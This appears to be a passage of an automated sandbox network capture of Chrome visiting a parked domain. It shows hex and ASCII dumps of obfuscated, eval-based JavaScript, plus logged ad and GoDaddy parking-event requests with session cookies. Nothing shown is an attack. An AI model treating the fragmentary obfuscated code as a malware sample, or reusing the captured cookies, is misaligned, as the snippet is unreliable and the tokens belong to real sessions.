                                                                          2024-08-29 15:12:25 UTC591INData Raw: 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 64 61 74 61 3a 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3b 62 61 73 65 36 34 2c 65 79 4a 32 5a 58 4a 7a 61 57 39 75 49 6a 6f 67 4d 79 77 69 63 32 39 31 63 6d 4e 6c 63 79 49 36 57 79 49 69 58 53 77 69 63 32 39 31 63 6d 4e 6c 63 30 4e 76 62 6e 52 6c 62 6e 51 69 4f 6c 73 69 49 43 4a 64 4c 43 4a 75 59 57 31 6c 63 79 49 36 57 79 4a 6a 62 47 39 7a 64 58 4a 6c 52 48 6c 75 59 57 31 70 59 30 4a 31 64 48 52 76 62 69 4a 64 4c 43 4a 74 59 58 42 77 61 57 35 6e 63 79 49 36 49 6b 46 42 51 55 45 37 51 55 46 42 51 54 74 42 51 55 46 42 4f 30 46 42 51 55 45 37 51 55 46 42 51 54 74 42 51 55 46 42 4f 30 46 42 51 55 45 69 66 51 3d 3d 0a 28 66 75 6e 63 74 69 6f 6e 28
                                                                          Data Ascii: //# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==(function(
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 73 2c 7a 3d 32 31 3b 65 6c 73 65 20 69 66 28 7a 3d 3d 33 38 29 56 2e 63 6f 6e 73 6f 6c 65 5b 59 5d 28 4c 2e 6d 65 73 73 61 67 65 29 2c 7a 3d 52 3b 65 6c 73 65 20 69 66 28 7a 3d 3d 31 35 29 72 65 74 75 72 6e 20 51 7d 7d 63 61 74 63 68 28 57 29 7b 69 66 28 62 3d 3d 6e 29 74 68 72 6f 77 20 57 3b 62 3d 3d 36 35 26 26 28 4c 3d 57 2c 7a 3d 76 29 7d 7d 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 52 29 7b 72 65 74 75 72 6e 20 66 2e 63 61 6c 6c 28 74 68 69 73 2c 52 29 7d 2c 56 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 28 30 2c 65 76 61 6c 29 28 66 75 6e 63 74 69 6f 6e 28 52 2c 76 29 7b 72 65 74 75 72 6e 28 76 3d 47 28 39 35 2c 39 36 2c 34 31 2c 33 35 2c 22 65 72 72 6f 72 22 2c 22 62 67 22 2c 6e 75 6c 6c 29 29 26 26 52 2e 65 76 61 6c 28 76 2e 63 72 65 61 74 65 53 63 72 69 70 74
                                                                          Data Ascii: s,z=21;else if(z==38)V.console[Y](L.message),z=R;else if(z==15)return Q}}catch(W){if(b==n)throw W;b==65&&(L=W,z=v)}},w=function(R){return f.call(this,R)},V=this||self;(0,eval)(function(R,v){return(v=G(95,96,41,35,"error","bg",null))&&R.eval(v.createScript
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 65 6c 73 65 20 69 66 28 4c 3d 3d 38 30 29 4c 3d 28 6e 7c 39 29 3e 3e 34 3c 32 26 26 28 28 6e 5e 36 38 29 26 31 34 29 3e 3d 38 3f 33 38 3a 39 35 3b 65 6c 73 65 20 69 66 28 4c 3d 3d 37 30 29 64 65 6c 65 74 65 20 52 2e 73 5b 42 5d 2c 52 2e 7a 50 2d 2d 2c 4c 3d 39 35 3b 65 6c 73 65 7b 69 66 28 4c 3d 3d 39 36 29 72 65 74 75 72 6e 20 76 3b 4c 3d 3d 31 35 26 26 28 4c 3d 28 6e 26 31 30 30 29 3d 3d 6e 3f 37 34 3a 36 35 29 7d 7d 2c 6e 44 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 6e 2c 62 2c 52 2c 42 2c 51 2c 77 29 7b 66 6f 72 28 51 3d 35 38 3b 51 21 3d 31 37 3b 29 69 66 28 51 3d 3d 35 34 29 74 68 69 73 2e 73 72 63 3d 62 2c 74 68 69 73 2e 73 3d 7b 7d 2c 74 68 69 73 2e 7a 50 3d 30 2c 51 3d 37 3b 65 6c 73 65 20 69 66 28 51 3d 3d 33 29 51 3d 6e 2b 37 26 31 31 3f 39 37 3a 33
                                                                          Data Ascii: else if(L==80)L=(n|9)>>4<2&&((n^68)&14)>=8?38:95;else if(L==70)delete R.s[B],R.zP--,L=95;else{if(L==96)return v;L==15&&(L=(n&100)==n?74:65)}},nD=function(z,n,b,R,B,Q,w){for(Q=58;Q!=17;)if(Q==54)this.src=b,this.s={},this.zP=0,Q=7;else if(Q==3)Q=n+7&11?97:3
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 75 6e 63 74 69 6f 6e 22 3f 42 3d 6e 3a 28 6e 5b 66 44 5d 7c 7c 28 6e 5b 66 44 5d 3d 66 75 6e 63 74 69 6f 6e 28 77 29 7b 72 65 74 75 72 6e 20 6e 2e 68 61 6e 64 6c 65 45 76 65 6e 74 28 77 29 7d 29 2c 42 3d 6e 5b 66 44 5d 29 2c 51 3d 7a 29 7d 7d 2c 44 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 6e 2c 62 2c 52 2c 42 2c 51 29 7b 66 6f 72 28 51 3d 36 37 3b 51 21 3d 33 38 3b 29 69 66 28 51 3d 3d 32 29 41 28 52 2c 6e 2c 62 29 2c 62 5b 56 4a 5d 3d 32 37 39 36 2c 51 3d 32 35 3b 65 6c 73 65 20 69 66 28 51 3d 3d 34 35 29 74 68 69 73 5b 74 68 69 73 2b 22 22 5d 3d 74 68 69 73 2c 51 3d 35 37 3b 65 6c 73 65 20 69 66 28 51 3d 3d 31 30 29 51 3d 28 7a 26 31 32 32 29 3d 3d 7a 3f 37 35 3a 32 33 3b 65 6c 73 65 20 69 66 28 51 3d 3d 32 35 29 51 3d 28 7a 2b 33 26 32 39 29 3c 7a 26 26 28
                                                                          Data Ascii: unction"?B=n:(n[fD]||(n[fD]=function(w){return n.handleEvent(w)}),B=n[fD]),Q=z)}},D=function(z,n,b,R,B,Q){for(Q=67;Q!=38;)if(Q==2)A(R,n,b),b[VJ]=2796,Q=25;else if(Q==45)this[this+""]=this,Q=57;else if(Q==10)Q=(z&122)==z?75:23;else if(Q==25)Q=(z+3&29)<z&&(
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 2c 77 35 2d 2d 2c 51 3d 58 28 36 2c 42 29 2c 4c 3d 32 37 3b 65 6c 73 65 20 69 66 28 4c 3d 3d 33 30 29 74 68 69 73 5b 74 68 69 73 2b 22 22 5d 3d 74 68 69 73 2c 4c 3d 31 34 3b 65 6c 73 65 7b 69 66 28 4c 3d 3d 31 34 29 72 65 74 75 72 6e 20 76 3b 4c 3d 3d 31 30 3f 4c 3d 38 30 3a 4c 3d 3d 35 31 3f 28 69 51 28 39 36 2c 74 72 75 65 2c 31 33 2c 52 29 2c 4c 3d 34 31 29 3a 4c 3d 3d 39 39 3f 4c 3d 42 26 26 42 5b 67 35 5d 3f 34 34 3a 34 32 3a 4c 3d 3d 35 30 3f 4c 3d 7a 3e 3e 31 26 37 3f 33 33 3a 39 30 3a 4c 3d 3d 38 30 3f 4c 3d 28 7a 2b 32 5e 31 35 29 3e 3d 7a 26 26 28 7a 2b 34 5e 33 31 29 3c 7a 3f 36 33 3a 34 31 3a 4c 3d 3d 32 37 26 26 28 4c 3d 51 3f 36 34 3a 35 31 29 7d 7d 2c 6c 51 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 6e 2c 62 2c 52 2c 42 2c 51 2c 77 2c 57 2c 4c 2c
                                                                          Data Ascii: ,w5--,Q=X(6,B),L=27;else if(L==30)this[this+""]=this,L=14;else{if(L==14)return v;L==10?L=80:L==51?(iQ(96,true,13,R),L=41):L==99?L=B&&B[g5]?44:42:L==50?L=z>>1&7?33:90:L==80?L=(z+2^15)>=z&&(z+4^31)<z?63:41:L==27&&(L=Q?64:51)}},lQ=function(z,n,b,R,B,Q,w,W,L,
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 35 30 3f 36 37 3a 32 39 3b 65 6c 73 65 20 69 66 28 56 3d 3d 36 37 29 74 68 69 73 2e 53 2e 70 75 73 68 28 62 29 2c 56 3d 34 38 3b 65 6c 73 65 20 69 66 28 56 3d 3d 32 39 29 52 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 74 68 69 73 2e 6e 29 2c 52 3c 35 30 26 26 28 74 68 69 73 2e 53 5b 52 5d 3d 62 29 2c 56 3d 34 38 3b 65 6c 73 65 20 69 66 28 56 3d 3d 37 38 29 56 3d 42 26 26 42 2e 6f 6e 63 65 3f 34 37 3a 32 36 3b 65 6c 73 65 20 69 66 28 56 3d 3d 32 37 29 56 3d 36 35 3b 65 6c 73 65 20 69 66 28 56 3d 3d 36 35 29 56 3d 28 28 6e 5e 39 34 29 26 37 29 3d 3d 33 3f 31 36 3a 34 38 3b 65 6c 73 65 20 69 66 28 56 3d 3d 32 36 29 56 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 4c 29 3f 37 36 3a 38 33 3b 65 6c 73 65 20 69 66 28 56 3d 3d 31
                                                                          Data Ascii: 50?67:29;else if(V==67)this.S.push(b),V=48;else if(V==29)R=Math.floor(Math.random()*this.n),R<50&&(this.S[R]=b),V=48;else if(V==78)V=B&&B.once?47:26;else if(V==27)V=65;else if(V==65)V=((n^94)&7)==3?16:48;else if(V==26)V=Array.isArray(L)?76:83;else if(V==1
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 29 7b 66 6f 72 28 42 3d 28 51 3d 6d 28 62 2c 32 38 29 2c 30 29 3b 52 3e 30 3b 52 2d 2d 29 42 3d 42 3c 3c 7a 7c 76 6f 28 33 30 36 2c 62 2c 74 72 75 65 29 3b 41 28 62 2c 51 2c 42 29 7d 72 65 74 75 72 6e 28 6e 26 32 38 29 3d 3d 6e 26 26 28 7a 2e 47 3f 77 3d 78 4e 28 7a 2c 7a 2e 4f 29 3a 28 62 3d 55 38 28 33 30 36 2c 7a 2c 74 72 75 65 2c 38 29 2c 2d 31 32 38 2d 32 2a 7e 28 62 26 31 32 38 29 2b 2d 32 2b 28 7e 62 26 31 32 38 29 26 26 28 62 5e 3d 31 32 38 2c 52 3d 55 38 28 33 30 36 2c 7a 2c 74 72 75 65 2c 32 29 2c 62 3d 28 62 3c 3c 32 29 2b 28 52 7c 30 29 29 2c 77 3d 62 29 29 2c 77 7d 2c 58 32 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 6e 2c 62 2c 52 2c 42 2c 51 2c 77 2c 57 2c 4c 2c 76 2c 66 2c 56 29 7b 66 6f 72 28 56 3d 35 38 3b 56 21 3d 33 36 3b 29 69 66 28 56 3d 3d
                                                                          Data Ascii: ){for(B=(Q=m(b,28),0);R>0;R--)B=B<<z|vo(306,b,true);A(b,Q,B)}return(n&28)==n&&(z.G?w=xN(z,z.O):(b=U8(306,z,true,8),-128-2*~(b&128)+-2+(~b&128)&&(b^=128,R=U8(306,z,true,2),b=(b<<2)+(R|0)),w=b)),w},X2=function(z,n,b,R,B,Q,w,W,L,v,f,V){for(V=58;V!=36;)if(V==
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 70 74 75 72 65 3a 21 21 51 2c 57 3d 69 51 28 39 36 2c 57 2c 38 29 2c 67 3d 35 35 29 3a 67 3d 3d 30 3f 67 3d 56 3c 42 2e 6c 65 6e 67 74 68 3f 33 37 3a 34 32 3a 67 3d 3d 35 30 3f 67 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 42 29 3f 33 30 3a 35 38 3a 67 3d 3d 34 33 3f 67 3d 33 31 3a 67 3d 3d 34 35 3f 67 3d 35 32 3a 67 3d 3d 37 37 3f 28 77 2e 69 2e 72 65 6d 6f 76 65 28 53 74 72 69 6e 67 28 42 29 2c 57 2c 4c 2c 52 29 2c 67 3d 34 32 29 3a 67 3d 3d 36 37 3f 67 3d 28 7a 7c 35 36 29 3d 3d 7a 3f 36 36 3a 33 35 3a 67 3d 3d 37 31 3f 28 28 76 3d 66 2e 51 6f 28 42 2c 4c 2c 52 2c 57 29 29 26 26 4f 28 31 34 2c 22 6f 6e 22 2c 30 2c 76 29 2c 67 3d 34 32 29 3a 67 3d 3d 34 32 3f 67 3d 28 7a 7c 37 32 29 3d 3d 7a 3f 33 3a 34 3a 67 3d 3d 35 32 3f 67 3d 7a 2d 37 3c 3c 31 3c
                                                                          Data Ascii: pture:!!Q,W=iQ(96,W,8),g=55):g==0?g=V<B.length?37:42:g==50?g=Array.isArray(B)?30:58:g==43?g=31:g==45?g=52:g==77?(w.i.remove(String(B),W,L,R),g=42):g==67?g=(z|56)==z?66:35:g==71?((v=f.Qo(B,L,R,W))&&O(14,"on",0,v),g=42):g==42?g=(z|72)==z?3:4:g==52?g=z-7<<1<
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 6e 3f 38 35 3a 32 35 3b 65 6c 73 65 20 69 66 28 59 3d 3d 32 34 29 6c 3d 53 45 28 6e 2c 36 2c 32 35 2c 70 29 2c 59 3d 34 34 3b 65 6c 73 65 20 69 66 28 59 3d 3d 7a 29 4c 26 26 76 26 26 4c 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 76 2c 66 2c 61 72 29 2c 59 3d 32 35 3b 65 6c 73 65 20 69 66 28 59 3d 3d 32 30 29 7b 76 61 72 20 67 3d 21 6e 2e 67 2e 6c 65 6e 67 74 68 3b 59 3d 28 28 5a 28 35 37 2c 30 2c 6e 2c 70 29 2c 67 29 26 26 46 28 38 34 2c 32 35 34 2c 42 2c 6e 2c 42 29 2c 34 34 29 7d 65 6c 73 65 20 69 66 28 59 3d 3d 36 39 29 59 3d 57 3d 3d 32 3f 31 3a 38 33 3b 65 6c 73 65 20 69 66 28 59 3d 3d 36 29 76 61 72 20 70 3d 28 59 3d 36 39 2c 5b 6d 30 2c 77 2c 52 2c 76 6f 69 64 20 30 2c 4c 2c 76 2c 61 72 67 75 6d 65 6e 74 73 5d 29 3b 65 6c 73 65
                                                                          Data Ascii: n?85:25;else if(Y==24)l=SE(n,6,25,p),Y=44;else if(Y==z)L&&v&&L.removeEventListener(v,f,ar),Y=25;else if(Y==20){var g=!n.g.length;Y=((Z(57,0,n,p),g)&&F(84,254,B,n,B),44)}else if(Y==69)Y=W==2?1:83;else if(Y==6)var p=(Y=69,[m0,w,R,void 0,L,v,arguments]);else
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 3f 51 2e 64 6c 28 29 3a 6e 65 77 20 51 3a 6e 75 6c 6c 2c 76 3d 35 37 29 3a 76 3d 3d 38 31 3f 28 42 3d 69 51 28 39 36 2c 42 2c 31 30 29 2c 52 26 26 52 5b 67 35 5d 3f 52 2e 69 2e 61 64 64 28 53 74 72 69 6e 67 28 57 29 2c 42 2c 62 2c 49 28 35 36 2c 6e 75 6c 6c 2c 77 29 3f 21 21 77 2e 63 61 70 74 75 72 65 3a 21 21 77 2c 51 29 3a 72 35 28 31 38 2c 6e 75 6c 6c 2c 66 61 6c 73 65 2c 57 2c 77 2c 42 2c 62 2c 52 2c 51 29 2c 76 3d 34 29 3a 76 3d 3d 33 39 3f 28 4c 2b 2b 2c 76 3d 39 30 29 3a 76 3d 3d 37 34 3f 28 62 28 66 75 6e 63 74 69 6f 6e 28 56 29 7b 56 28 6e 29 7d 29 2c 66 3d 5b 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 5d 2c 76 3d 34 35 29 3a 76 3d 3d 38 38 3f 76 3d 7a 2b 39 3e 3e 33 3d 3d 33 3f 37 34 3a 34
                                                                          Data Ascii: ?Q.dl():new Q:null,v=57):v==81?(B=iQ(96,B,10),R&&R[g5]?R.i.add(String(W),B,b,I(56,null,w)?!!w.capture:!!w,Q):r5(18,null,false,W,w,B,b,R,Q),v=4):v==39?(L++,v=90):v==74?(b(function(V){V(n)}),f=[function(){return n},function(){}],v=45):v==88?v=z+9>>3==3?74:4


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          28192.168.2.553747172.217.16.2064434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:25 UTC880OUTGET /afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=11hs6q014uq&aqid=1Y_QZrGTL9KnjuwPiPe1wA0&psid=7621175430&pbt=bs&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=4%7C0%7C1541%7C1243%7C284&lle=0&ifv=1&hpt=0 HTTP/1.1
                                                                          Host: syndicatedsearch.goog
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:25 UTC715INHTTP/1.1 204 No Content
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Cipd9fE2r4horRBdJgcJUA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                          Permissions-Policy: unload=()
                                                                          Date: Thu, 29 Aug 2024 15:12:25 GMT
                                                                          Server: gws
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          29192.168.2.55379054.174.215.774434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:25 UTC646OUTPOST /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1
                                                                          Host: api.aws.parking.godaddy.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 920
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Content-Type: application/json
                                                                          Accept: */*
                                                                          Origin: https://www.onefordvd.com
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:25 UTC920OUTData Raw: 7b 22 65 76 65 6e 74 54 79 70 65 22 3a 22 56 49 53 49 54 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 38 2d 32 39 54 31 35 3a 31 32 3a 32 32 2e 37 39 33 5a 22 2c 22 64 6f 6d 61 69 6e 22 3a 22 6f 6e 65 66 6f 72 64 76 64 2e 63 6f 6d 22 2c 22 64 6f 6d 61 69 6e 53 74 61 74 75 73 22 3a 22 41 43 54 49 56 45 22 2c 22 73 79 73 74 65 6d 22 3a 22 53 4e 22 2c 22 64 61 74 61 53 6f 75 72 63 65 22 3a 22 49 4e 56 45 4e 54 4f 52 59 22 2c 22 69 73 54 75 72 6e 4b 65 79 52 65 73 65 6c 6c 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 43 6e 61 6d 65 22 3a 66 61 6c 73 65 2c 22 61 63 63 6f 75 6e 74 22 3a 22 31 31 64 31 64 65 66 35 33 34 65 61 31 62 65 30 58 34 33 31 36 32 39 33 66 58 31 35 62 63 62 63 65 35 31 30 62 58 58 32 66 38 65 20 22 2c 22 63 75 73 74 6f 6d 65
                                                                          Data Ascii: {"eventType":"VISIT","createdAt":"2024-08-29T15:12:22.793Z","domain":"onefordvd.com","domainStatus":"ACTIVE","system":"SN","dataSource":"INVENTORY","isTurnKeyReseller":false,"isCname":false,"account":"11d1def534ea1be0X4316293fX15bcbce510bXX2f8e ","custome
                                                                          2024-08-29 15:12:25 UTC563INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:25 GMT
                                                                          Content-Type: text/plain
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          Set-Cookie: AWSALB=WSfU3Zvt1dnVYhYsTOvZDl/S2Zs3d+wkJrCR9MuV7akpIbTa6IjMMcG6LroATngmGT/8gKxe03/8BToaJ3cwqb/HoUfjLaHXwDH8mOp8jhJ1Kbunhvkz9JlcTMoM; Expires=Thu, 05 Sep 2024 15:12:25 GMT; Path=/
                                                                          Set-Cookie: AWSALBCORS=WSfU3Zvt1dnVYhYsTOvZDl/S2Zs3d+wkJrCR9MuV7akpIbTa6IjMMcG6LroATngmGT/8gKxe03/8BToaJ3cwqb/HoUfjLaHXwDH8mOp8jhJ1Kbunhvkz9JlcTMoM; Expires=Thu, 05 Sep 2024 15:12:25 GMT; Path=/; SameSite=None; Secure
                                                                          access-control-allow-origin: *


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          30192.168.2.55379254.174.215.774434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:26 UTC646OUTPOST /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1
                                                                          Host: api.aws.parking.godaddy.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 935
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Content-Type: application/json
                                                                          Accept: */*
                                                                          Origin: https://www.onefordvd.com
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:26 UTC935OUTData Raw: 7b 22 65 76 65 6e 74 54 79 70 65 22 3a 22 56 49 53 49 54 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 38 2d 32 39 54 31 35 3a 31 32 3a 32 34 2e 38 34 39 5a 22 2c 22 64 6f 6d 61 69 6e 22 3a 22 6f 6e 65 66 6f 72 64 76 64 2e 63 6f 6d 22 2c 22 64 6f 6d 61 69 6e 53 74 61 74 75 73 22 3a 22 41 43 54 49 56 45 22 2c 22 73 79 73 74 65 6d 22 3a 22 53 4e 22 2c 22 64 61 74 61 53 6f 75 72 63 65 22 3a 22 49 4e 56 45 4e 54 4f 52 59 22 2c 22 69 73 54 75 72 6e 4b 65 79 52 65 73 65 6c 6c 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 43 6e 61 6d 65 22 3a 66 61 6c 73 65 2c 22 61 63 63 6f 75 6e 74 22 3a 22 31 31 64 31 64 65 66 35 33 34 65 61 31 62 65 30 58 34 33 31 36 32 39 33 66 58 31 35 62 63 62 63 65 35 31 30 62 58 58 32 66 38 65 20 22 2c 22 63 75 73 74 6f 6d 65
                                                                          Data Ascii: {"eventType":"VISIT","createdAt":"2024-08-29T15:12:24.849Z","domain":"onefordvd.com","domainStatus":"ACTIVE","system":"SN","dataSource":"INVENTORY","isTurnKeyReseller":false,"isCname":false,"account":"11d1def534ea1be0X4316293fX15bcbce510bXX2f8e ","custome
                                                                          2024-08-29 15:12:26 UTC563INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:26 GMT
                                                                          Content-Type: text/plain
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          Set-Cookie: AWSALB=G9CxwZsmSUZSdkZbx3J2QTzg034P4mD02GBmgzBP6U5uWGlEN3NO+cEAV8VcSjGHFptZ8oPajZX4wgNlXo9IMxeR217/nrHX7P2Qy3UUzeGmf2zMN++dciy1FiK1; Expires=Thu, 05 Sep 2024 15:12:26 GMT; Path=/
                                                                          Set-Cookie: AWSALBCORS=G9CxwZsmSUZSdkZbx3J2QTzg034P4mD02GBmgzBP6U5uWGlEN3NO+cEAV8VcSjGHFptZ8oPajZX4wgNlXo9IMxeR217/nrHX7P2Qy3UUzeGmf2zMN++dciy1FiK1; Expires=Thu, 05 Sep 2024 15:12:26 GMT; Path=/; SameSite=None; Secure
                                                                          access-control-allow-origin: *


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          31192.168.2.553793172.217.16.2064434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:26 UTC881OUTGET /afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=lhb5r7xl5det&aqid=1Y_QZrGTL9KnjuwPiPe1wA0&psid=7621175430&pbt=bv&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=4%7C0%7C1541%7C1243%7C284&lle=0&ifv=1&hpt=0 HTTP/1.1
                                                                          Host: syndicatedsearch.goog
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:26 UTC715INHTTP/1.1 204 No Content
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-l4l9aFliiLF4r_OFFJoPkw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                          Permissions-Policy: unload=()
                                                                          Date: Thu, 29 Aug 2024 15:12:26 GMT
                                                                          Server: gws
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          32192.168.2.55379754.174.215.774434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:26 UTC710OUTGET /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1
                                                                          Host: api.aws.parking.godaddy.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: AWSALB=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; AWSALBCORS=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; cpvisitor=f491361e-23b1-46ad-b955-49e64997c4da
